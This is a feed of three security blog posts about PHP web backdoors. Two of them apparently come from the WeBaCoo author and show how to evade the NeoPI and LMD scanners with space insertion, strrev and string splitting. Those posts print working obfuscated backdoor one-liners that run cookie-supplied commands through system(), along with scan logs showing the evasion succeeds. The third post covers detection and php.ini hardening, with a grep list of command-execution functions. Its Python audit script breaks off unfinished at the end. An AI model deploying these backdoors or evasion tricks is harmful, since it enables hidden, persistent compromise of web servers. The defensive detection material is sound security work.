Anestis Bechtsoudis » malware detection (http://bechtsoudis.com)

Maths behind web shell code detection
http://bechtsoudis.com/2011/12/16/maths-behind-web-shell-code-detection/
Fri, 16 Dec 2011 16:36:20 +0000

While working on WeBaCoo's stealth behavior I keep examining the tools and methods used to detect hidden web backdoor code on infected hosts. The latest one to come to my attention is NeoPI, a Python script that applies several statistical tests to text and script files in order to surface obfuscated or encrypted content. NeoPI takes an interesting approach: it ranks potentially malicious files by Entropy, Longest Word and Index of Coincidence. Unfortunately, WeBaCoo's base64-obfuscated backdoor did not pass unnoticed; it ranked within the top 10 in a regular web server setup. So I took a closer look at the tool to find ways of bypassing its tests effectively.

I mentioned NeoPI in one of my previous posts about web backdoor detection, although until recently I had not realized how useful it can be under certain circumstances. The tool has five test categories:

  1. Entropy: Shannon entropy of the file's character distribution; high values indicate compressed, encrypted or encoded content
  2. Longest Word: long unbroken strings may be encrypted or obfuscated code
  3. Index of Coincidence: a low IC indicates potential encryption or obfuscation
  4. Signature: search files for "dangerous" strings such as command execution and decoding function names
  5. Compression: compare the files' compression ratios; random-looking data compresses poorly

To examine NeoPI's results in a realistic setup, I set up a Debian web server VM with three CMS installations (Joomla, WordPress and Coppermine). Under the web root I placed two files generated by WeBaCoo: webacoo.php (base64 obfuscated) and webacoo_raw.php (raw PHP code).

To make the results more accurate, the file extension regular expression feature was used so that only server-side PHP files are scanned. The initial report for all tests under the web root is as follows:

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.7306		/var/www/webacoo.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372679517799
 
[[ Top 10 lowest IC files ]]
  0.0198		/var/www/webacoo.php
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     122		/var/www/webacoo.php
     202		/var/www/blog/wp-admin/js/revisions-js.php
     528		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     912		/var/www/plugins/content/jw_allvideos/includes/helper.php
     984		/var/www/modules/mod_archive/helper.php
    1100		/var/www/libraries/bitfolge/vcard.php
    1210		/var/www/administrator/components/com_content/elements/article.php
    1240		/var/www/gallery/addfav.php
    1246		/var/www/administrator/components/com_installer/admin.installer.php
    1258		/var/www/administrator/components/com_config/views/component/view.php

While webacoo_raw.php passed the tests, the obfuscated webacoo.php did not have the same luck: it ranks sixth on Entropy and first (lowest) on Index of Coincidence, which marks it as a possible malicious file and puts it at the top of the cumulative ranking. Its Longest Word score is high as well (the payload is a single 295-character base64 token), but in this lab setup that is hidden by the CMS code, which carries even longer legitimate strings (regular expressions, validation tables, embedded data).

These high scores are caused by the base64-encoded payload string: a long run of characters drawn almost uniformly from a 64-symbol alphabet has high entropy, a low IC and no whitespace. To bypass the tests, the generated code must alter these properties. My first thought was to split the encoded data into smaller chunks that are concatenated at runtime to form the payload. After some tests this proved insufficient against the IC and Entropy tests, since the character distribution of the file barely changes. A second approach is to insert spaces into the encoded data (space is not a valid base64 character) and strip them with a replace function before decoding; the space then becomes the most frequent symbol in the payload, which lowers the entropy, raises the IC and breaks the payload into short tokens.

The question then is: after how many characters should a space be inserted for the best result? To find the most effective value I generated variants with a space after every 1, 5, 10 and 20 characters and ran NeoPI on the directory holding them:

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/pwn/ \.php$
[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  5.7646		/var/www/pwn/webacoo_new20.php
  5.7306		/var/www/pwn/webacoo.php
  5.6999		/var/www/pwn/webacoo_new10.php
  5.5322		/var/www/pwn/webacoo_new5.php
  5.1328		/var/www/pwn/webacoo_raw.php
  4.2037		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 longest word files ]]
     295		/var/www/pwn/webacoo.php
      94		/var/www/pwn/webacoo_raw.php
      51		/var/www/pwn/webacoo_new1.php
      51		/var/www/pwn/webacoo_new10.php
      51		/var/www/pwn/webacoo_new5.php
      51		/var/www/pwn/webacoo_new20.php
 
[[ Average IC for Search ]]
0.040872937004
 
[[ Top 10 lowest IC files ]]
  0.0194		/var/www/pwn/webacoo_new20.php
  0.0198		/var/www/pwn/webacoo.php
  0.0224		/var/www/pwn/webacoo_new10.php
  0.0301		/var/www/pwn/webacoo_raw.php
  0.0338		/var/www/pwn/webacoo_new5.php
  0.2009		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 signature match counts ]]
       1		/var/www/pwn/webacoo.php
       1		/var/www/pwn/webacoo_raw.php
       1		/var/www/pwn/webacoo_new1.php
       1		/var/www/pwn/webacoo_new10.php
       1		/var/www/pwn/webacoo_new5.php
       1		/var/www/pwn/webacoo_new20.php
 
[[ Top 10 compression match counts ]]
  0.8114		/var/www/pwn/webacoo_new10.php
  0.8101		/var/www/pwn/webacoo_new20.php
  0.7993		/var/www/pwn/webacoo.php
  0.7947		/var/www/pwn/webacoo_new5.php
  0.7593		/var/www/pwn/webacoo_raw.php
  0.5407		/var/www/pwn/webacoo_new1.php
 
[[ Top cumulative ranked files ]]
       8		/var/www/pwn/webacoo_new20.php
       9		/var/www/pwn/webacoo.php
      11		/var/www/pwn/webacoo_new10.php
      17		/var/www/pwn/webacoo_new5.php
      17		/var/www/pwn/webacoo_raw.php
      22		/var/www/pwn/webacoo_new1.php

webacoo_new20.php (a space every 20 characters) behaves worst: it ranks even above the original webacoo.php with no spaces inserted. At the other end, webacoo_new1.php (a space after every character) has the lowest score in every individual test, making it the most effective choice; it even ranks below the raw, unobfuscated code.
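The four statistical tests above are simple enough to reproduce, and doing so makes clear why a space after every character works while a space every 20 characters does not. The following Python is an added example written for this article, not NeoPI's code (its exact formulas and ranking may differ): it implements entropy, index of coincidence, longest word and a zlib compression ratio, and applies them to a constructed base64 payload (a small PHP one-liner, not WeBaCoo's real encoded code) with spaces inserted every k characters.

```python
import base64
import math
import zlib
from collections import Counter

# Constructed sample: base64 of a small PHP one-liner, standing in for the
# WeBaCoo payload (this is not WeBaCoo's real encoded code).
PAYLOAD_B64 = base64.b64encode(b"if(isset($_GET['c'])){system($_GET['c']);}").decode()


def shannon_entropy(data: str) -> float:
    """Entropy in bits per character over the text's own symbol frequencies."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def index_of_coincidence(data: str) -> float:
    """IC = sum(n_i * (n_i - 1)) / (N * (N - 1)).

    English prose sits near 0.065; text drawn uniformly from the 64 base64
    symbols tends toward 1/64 = 0.0156, which is what a 'low IC' test catches.
    """
    n = len(data)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(data).values()) / (n * (n - 1))


def longest_word(data: str) -> int:
    """Length of the longest whitespace-delimited token."""
    return max((len(tok) for tok in data.split()), default=0)


def compression_ratio(data: str) -> float:
    """zlib-compressed size over original size; random-looking data stays near 1."""
    raw = data.encode()
    return len(zlib.compress(raw, 9)) / len(raw)


def space_every(data: str, k: int) -> str:
    """Insert a space after every k characters (k <= 0 leaves the data unchanged).

    Space is not a base64 symbol, so str_replace(" ", "", ...) on the PHP side
    restores the original string before decoding.
    """
    if k <= 0:
        return data
    return " ".join(data[i:i + k] for i in range(0, len(data), k))


def metrics(data: str) -> dict:
    """All four scores for one string, rounded the way NeoPI prints them."""
    return {
        "entropy": round(shannon_entropy(data), 4),
        "ic": round(index_of_coincidence(data), 4),
        "longest_word": longest_word(data),
        "compression": round(compression_ratio(data), 4),
    }


def evasion_report(payload: str, chunk_sizes=(0, 1, 5, 10, 20)) -> dict:
    """Scores for the plain payload (k=0) and for each spaced variant."""
    return {k: metrics(space_every(payload, k)) for k in chunk_sizes}


if __name__ == "__main__":
    print(f"{'k':>3} {'entropy':>8} {'IC':>7} {'longest':>8} {'compr':>7}")
    for k, m in evasion_report(PAYLOAD_B64).items():
        print(f"{k:>3} {m['entropy']:>8} {m['ic']:>7} {m['longest_word']:>8} {m['compression']:>7}")
```

With k=1 roughly half of all characters are spaces, so the entropy drops towards 1 + H/2 bits (H being the entropy of the bare payload) and the IC jumps to about 0.25, far above the 0.037 average of the lab directory; that is why webacoo_new1.php ends up looking less suspicious than the raw code. A large k adds only a handful of spaces and leaves the distribution, and therefore the scores, essentially unchanged.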

The new backdoor file, which NeoPI no longer flags, is therefore as follows:

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
  5.6060		/var/www/blog/wp-config.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372700176166
 
[[ Top 10 lowest IC files ]]
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
  0.0273		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     199		/var/www/blog/wp-admin/js/revisions-js.php
     521		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     907		/var/www/plugins/content/jw_allvideos/includes/helper.php
     977		/var/www/modules/mod_archive/helper.php
    1094		/var/www/libraries/bitfolge/vcard.php
    1203		/var/www/administrator/components/com_content/elements/article.php
    1233		/var/www/gallery/addfav.php
    1240		/var/www/administrator/components/com_installer/admin.installer.php
    1252		/var/www/administrator/components/com_config/views/component/view.php
    1264		/var/www/xmlrpc/includes/framework.php

 

This new technique for bypassing statistical detection methods will be implemented in WeBaCoo's next release.

A. Bechtsoudis

Bypass base64 decoder detection
http://bechtsoudis.com/2011/12/11/bypass-base64-decoder-detection/
Sun, 11 Dec 2011 19:36:41 +0000

Almost two weeks after WeBaCoo's release, I started organizing the results of tests against various protection and detection tools for a comprehensive write-up. What drew my attention is how easily some malware scanners mark WeBaCoo's generated backdoor code as a "threat": a single call to the base64 decoder function is enough to trigger their content-matching rulesets, whatever the data being decoded. In addition to this rather crude approach, I recently came across some web backdoor detection tutorials whose checks amount to matching the decoder function name. These two things led me to a small investigation into tricks for bypassing such content-matching mechanisms.

The tools and scripts that marked WeBaCoo's generated code as a "threat" because of its base64_decode() call are listed below (see the first image gallery at the end of the post for the report screenshots):

After inspecting how these tools work, I came up with two main methods for tricking content matching on the decoder's name: string reversing and string splitting. The two can be combined for trickier code, keeping the number of added characters as low as possible. WeBaCoo generates PHP backdoor code, so I work the methods out in PHP, although the same concept applies to other languages too.

 

String Reversing

Luckily for us, PHP provides strrev() to reverse a string. Since the function name base64_decode is what triggered the tools above, strrev() can be used to hide it. Let's verify the concept with a small example before altering the backdoor.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>
root@testbed:~# php reverse.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/reverse.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4332): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4332): {scan} building file list for /var/www/pwn/reverse.php, this might take awhile...
maldet(4332): {scan} file list completed, found 1 files...
maldet(4332): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4332): {scan} scan of /var/www/pwn/reverse.php (1 files) in progress...

maldet(4332): {scan} scan completed on /var/www/pwn/reverse.php: files 1, malware hits 0, cleaned hits 0
maldet(4332): {scan} scan report saved, to view run: maldet --report 121111-2034.4332

 

String Splitting

The concept behind this technique is to split the trigger string ("base64_decode") into smaller chunks that are later concatenated to form the function name.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>
root@testbed:~# php split.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/split.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4509): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4509): {scan} building file list for /var/www/pwn/split.php, this might take awhile...
maldet(4509): {scan} file list completed, found 1 files...
maldet(4509): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4509): {scan} scan of /var/www/pwn/split.php (1 files) in progress...

maldet(4509): {scan} scan completed on /var/www/pwn/split.php: files 1, malware hits 0, cleaned hits 0
maldet(4509): {scan} scan report saved, to view run: maldet --report 121111-2049.4509

 

Since both techniques defeat detection of the decoder's name, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination, as used in the new backdoor code. I ran the same tests to see whether the new backdoor code passes all of them; the results are in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>

 

These two techniques will be implemented in WeBaCoo's next release once I settle on the most efficient way of using them.
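From the defender's side, both tricks (and the space-insertion trick from the NeoPI post above) rely on the literal string base64_decode never appearing in the file, so a scanner that folds constant expressions before matching gets it back. The following Python scanner is an added example, not code from WeBaCoo, LMD or ClamAV: it concatenates adjacent string literals, evaluates strrev() and str_replace() when their arguments are literals, propagates variables assigned a literal, and then matches a constructed signature list against the folded source. The PHP test inputs mirror the snippets in this post (with their comments removed) and are constructed here; the long-base64 check and its 40-character threshold are my own heuristic.

```python
import base64
import re

# Names that grep-style scanners key on (a constructed list, not LMD's or ClamAV's signatures).
SIGNATURES = ("base64_decode", "eval", "system", "shell_exec", "passthru", "exec", "assert")

# A PHP single- or double-quoted string literal, allowing backslash escapes.
_LIT = r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\''
_CONCAT = re.compile(rf"({_LIT})\s*\.\s*({_LIT})")
_STRREV = re.compile(rf"strrev\s*\(\s*({_LIT})\s*\)")
_STR_REPLACE = re.compile(rf"str_replace\s*\(\s*({_LIT})\s*,\s*({_LIT})\s*,\s*({_LIT})\s*\)")
_ASSIGN = re.compile(rf"\$(\w+)\s*=\s*({_LIT})\s*;")
# A variable read: $name not followed by an assignment operator.
_VARREF = re.compile(r"\$(\w+)\b(?!\s*=(?!=))")
# Heuristic: a long unbroken run of base64 alphabet characters (threshold is my choice).
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed inputs mirroring the snippets in this post, comments removed.
REVERSE_PHP = '<?php $data="c2hvdyBtZSB5b3VyIGNvZGU="; $bd=strrev("edoced_46esab"); eval("echo \\$bd(\\$data);"); ?>'
SPLIT_PHP = '<?php $data="c2hvdyBtZSB5b3VyIGNvZGU="; $ac="base6"; $bc="4_decode"; $cc=$ac.$bc; eval("echo \\$cc(\\$data);"); ?>'
_BLOB = base64.b64encode(b"if(isset($_COOKIE['cm'])){system(base64_decode($_COOKIE['cm']));}").decode()
COMBINED_PHP = '<?php $c=strrev("edoced_4"."6esab");eval($c(str_replace(" ","","' + " ".join(_BLOB) + '"))); ?>'
BENIGN_PHP = '<?php $greeting = "Hello, " . $name; echo $greeting; ?>'


def _unquote(lit: str) -> str:
    return lit[1:-1]


def _quote(s: str) -> str:
    return '"' + s + '"'


def fold_constants(src: str, max_rounds: int = 20) -> str:
    """Evaluate constant string expressions until the source stops changing.

    Each round folds literal.literal concatenation, strrev() and str_replace()
    on literal arguments, then substitutes variables that hold a literal.
    """
    for _ in range(max_rounds):
        new = _CONCAT.sub(lambda m: _quote(_unquote(m.group(1)) + _unquote(m.group(2))), src)
        new = _STRREV.sub(lambda m: _quote(_unquote(m.group(1))[::-1]), new)
        new = _STR_REPLACE.sub(
            lambda m: _quote(_unquote(m.group(3)).replace(_unquote(m.group(1)), _unquote(m.group(2)))),
            new,
        )
        assigned = {m.group(1): m.group(2) for m in _ASSIGN.finditer(new)}
        new = _VARREF.sub(lambda m: assigned.get(m.group(1), m.group(0)), new)
        if new == src:
            break
        src = new
    return src


def scan(src: str) -> dict:
    """Signature names present after folding, plus a long-base64-literal indicator."""
    folded = fold_constants(src)
    hits = sorted(name for name in SIGNATURES if re.search(rf"\b{name}\b", folded))
    return {"functions": hits, "long_base64_literal": bool(_B64_BLOB.search(folded))}


if __name__ == "__main__":
    for label, code in (("reverse", REVERSE_PHP), ("split", SPLIT_PHP),
                        ("combined", COMBINED_PHP), ("benign", BENIGN_PHP)):
        print(f"{label:>9}: {scan(code)}")
```

The folding is deliberately regex-based and incomplete (no real PHP parser, no arithmetic, no user-defined functions), so a determined author can still get past it; its value is that the cheap tricks shown in this post cost the defender a handful of rewrite rules rather than a new signature per variant.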

 

Initial Code Report Results

New Code Report Results

 
DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.
 

 

A. Bechtsoudis

Detect & Protect from PHP Backdoor Shells
http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/
Wed, 15 Jun 2011 13:26:53 +0000

Recently I undertook the investigation of a web server compromise. The machine was an up-to-date Debian box (apache2 + php5 + mysql) hosting a Joomla CMS for a logistics website. The web admin had installed a Joomla extension that allows users to put custom PHP code into their articles. The attacker had phished valid login credentials for the site and published an article containing a simple PHP backdoor shell. The moderator who approved the article did not notice the malicious code, so the article went public as usual.

Once the forensic work was finished, it turned out that the attacker had used the weevely tool to generate the PHP backdoor injected into the article. I had never dealt with a PHP backdoor incident before, and the investigation took two exhausting days. After identifying the problem and cleaning the infection, I did a little research on PHP backdoor detection and protection tools and scripts.

 

In the rest of the article I summarize the basic steps for detecting and protecting against malicious PHP code. Different approaches exist depending on the framework in use; what follows is a general guideline built from the tools and procedures I have used in my own cases.

 

Step1 – PHP Configuration Security Auditing

PHP is a very powerful language, but its runtime configuration must be tuned carefully to minimize the attack surface. Several security auditing tools and scripts exist; of those I have tested I prefer phpsecinfo. It parses the running PHP configuration and generates a web report with detailed findings and improvement suggestions.

Here are some screenshots from an example report:

 

 

Step2 – Running Web Platform Configuration

Popular CMSs and web platforms offer a large number of extensions and plugins. Inexperienced developers and admins tend to install as many as possible, believing this makes the site more attractive or functional. From a security perspective this is the wrong approach: every additional plugin is additional attack surface.

The developers of these popular platforms track newly published exploits and ship patches, so the core platform is reasonably protected against known attacks. Plugin source code, on the other hand, is revised and tested for security holes far less regularly, and a single vulnerable plugin endangers the whole platform.

Most plugins fit this description, although some developers do keep their plugins up to date and reasonably secure. So do not install unnecessary plugins, and when you must, review the plugin's source code and how it interacts with the core platform. Install plugins manually as well, so that you can inspect and tune their configuration variables and paths.

 

 

Step3 – Detection Tools & Scripts

PHP backdoor shells rely on the PHP functions that execute external commands on the host. These functions are well known, so a simple grep finds the files in which they occur; each hit can then be reviewed to decide whether it is legitimate or malicious. Here is a simple bash script that searches for command execution functions, file stream functions and base64-encoded code:

 

#!/bin/bash
 
#------------------------------------------------#
# Search web files for potential malicious code. #
#------------------------------------------------#
 
SEARCH_DIR="/var/www"
# Command execution, information disclosure, decoding and file stream functions.
PATTERNS="passthru|shell_exec|system|phpinfo|base64_decode|popen|exec|proc_open|pcntl_exec|python_eval|fopen|fclose|readfile"
 
# -R recurse, -P Perl regex, -l print only the names of matching files;
# the brace expansion yields one --include option per extension.
grep -RPl --include=*.{php,txt} "($PATTERNS)" "$SEARCH_DIR"
 
exit 0

 

Going a step beyond simple search scripts there is NeoPI, a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content in text and script files. I ran NeoPI on the incident above and it placed the malicious file high in its ranking. Keep in mind, though, that its statistical methods can also rank a malicious file below legitimate files with unusual content, and so lead an investigation astray.

 

For more advanced and comprehensive reports one can turn to a malware scanner. In this incident I used LMD (Linux Malware Detect). It was the first time I had used it and I am very satisfied with its functionality. To test it further I created four other PHP backdoors with known scripts from pen-test frameworks, and LMD found all of them.

 

And of course there is ClamAV, which I did not have time to set up and test against the PHP backdoors mentioned above; from what I have read it is effective and has successfully located PHP backdoors and malware.

 

 

Step4 – Protection

Protection countermeasures follow from the tools and information of the previous steps. Some PHP configuration points that sysadmins must pay attention to:

    • allow_url_fopen: lets the PHP file functions (fopen, file_get_contents and friends) open remote HTTP or FTP URLs. It is enabled in a default installation and rarely needed, so disable it; check that allow_url_include, which governs include/require of remote files, is off as well.
    • Dangerous PHP functions: use the disable_functions directive in php.ini to disable the system functions (system, shell_exec, passthru, exec, popen, proc_open, etc.) that malicious code relies on. Be careful with the rare web platforms that need some of them.
    • open_basedir: set this php.ini directive to restrict file operations to the defined directory tree and below.
    • Web user permissions: carefully examine the web server user's access level and the permissions on the files it can reach.
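As a worked check on those bullets, here is an added Python script (not from this post, and not phpsecinfo) that parses a php.ini fragment and reports the weak settings discussed: allow_url_fopen left on, allow_url_include on, command execution functions missing from disable_functions, and open_basedir unset. The two ini fragments are constructed for the example; the list of functions to disable follows the grep pattern earlier in this post.

```python
# Constructed php.ini fragments: one resembling a default install, one hardened
# along the lines of the bullets above. Neither is copied from a real server.
WEAK_INI = """
[PHP]
; defaults as shipped
allow_url_fopen = On
allow_url_include = Off
disable_functions =
;open_basedir =
"""

HARDENED_INI = """
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec
open_basedir = "/var/www:/tmp"
"""

# Command execution functions a web backdoor typically relies on.
SHELL_FUNCTIONS = {"system", "shell_exec", "passthru", "exec", "popen", "proc_open", "pcntl_exec"}


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: 'key = value' lines, ';' comments, [sections] ignored, quotes stripped."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#", "[")):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.split(";", 1)[0].strip().strip('"')
        settings[key.strip().lower()] = value
    return settings


def php_bool(value) -> bool:
    """php.ini truthiness: On/True/Yes/1 are true; Off/False/No/None/0/empty are false."""
    return str(value or "").strip().lower() in {"on", "true", "yes", "1"}


def audit(settings: dict) -> list:
    """Return (directive, finding) pairs for the weaknesses discussed above."""
    findings = []
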